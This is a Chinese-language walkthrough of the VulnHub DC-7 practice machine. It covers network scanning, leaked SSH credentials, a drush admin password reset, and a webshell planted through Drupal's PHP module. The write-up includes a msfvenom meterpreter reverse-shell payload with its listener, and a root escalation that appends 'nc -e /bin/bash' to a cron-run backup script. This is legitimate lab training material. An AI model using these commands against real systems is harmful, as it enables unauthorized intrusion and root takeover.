vulnhub之DC7靶机

介绍

系列: DC(此系列共10台)
发布日期:2019年8月31日
难度:中级
Flag:获取root权限,并拿到唯一的flag
学习:

  • drupal安装php实现挂马
  • 提权

靶机地址:https://www.vulnhub.com/entry/dc-7,356/
从靶场得到提示信息:

  • 靶机更适用Virtualbox
  • 不要尝试爆破,很难成功

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.1.125,只开放了22和80端口
在这里插入图片描述

访问网站

得知网站是 drupal 站点,网站首页的提示信息就是不建议我们爆破网站。
在这里插入图片描述

目录扫描没有发现任何有价值的信息,唯一有点意思的是左下角的“@DC7USER”,不知道是个啥玩意,丢谷歌上搜一下,发现了一个推特账号
在这里插入图片描述

得到一个github地址
在这里插入图片描述

经核对,这个github地址就是跟谷歌的第一个搜索结果是一个地址,然后就看到了账号:dc7user、密码:MdR3xOgB7#dW
在这里插入图片描述

尝试登录网站失败
在这里插入图片描述

额,那就只能尝试ssh连接了。然后就连接上了。

SSH登录

信息收集

在这里插入图片描述

唯一引人注目的就是mbox文件。直接查看乱糟糟的,使用mail -f mbox得知邮件共有9封,是以root身份定时运行/opt/scripts/backups.sh脚本得到的。靶场还没有sudo,那就来看看这个脚本是个什么东东吧。
在这里插入图片描述

得到的信息还挺多的
在这里插入图片描述

分析:

  1. 由于此脚本执行的是root权限,所以我们现在只要在脚本里写入反弹shell命令就能得到root权限的shell了
  2. www-data用户具有对该脚本写入的权限,所以我们拿到www-data用户的反弹shell就是root权限的shell
  3. drush命令是drupal系统中特定的管理工具。可以修改www-data用户admin密码

修改web后台密码

修改admin用户密码为admin:drush user-password admin --password="admin"
在这里插入图片描述

登录成功
在这里插入图片描述

挂马

没有找到可以挂马的地方,看了下别人的文章,真是涨了些见识,原来可以安装php来挂马

  1. 发现没有写入php的页面

在这里插入图片描述

  1. 下载php:https://www.drupal.org/project/php/releases/8.x-1.1

在这里插入图片描述

  1. 安装php

在这里插入图片描述

在这里插入图片描述

搜索php定位位置,勾选它,并点击安装
在这里插入图片描述

  1. 开始挂马

由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。

生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit
  1. 投放木马

在这里插入图片描述

  1. getshell

在这里插入图片描述

提权

反弹shell:echo 'nc -e /bin/bash 192.168.1.118 4444' >> /opt/scripts/backups.sh
kali开启监听:nc -nvlp 4444
由于脚本是每个15分钟运行一次,坐等15分钟吧

  1. 确认命令写入成功

在这里插入图片描述

  1. 听会歌,然后看到建立了nc连接

在这里插入图片描述


版权声明:本文为weixin_44288604原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。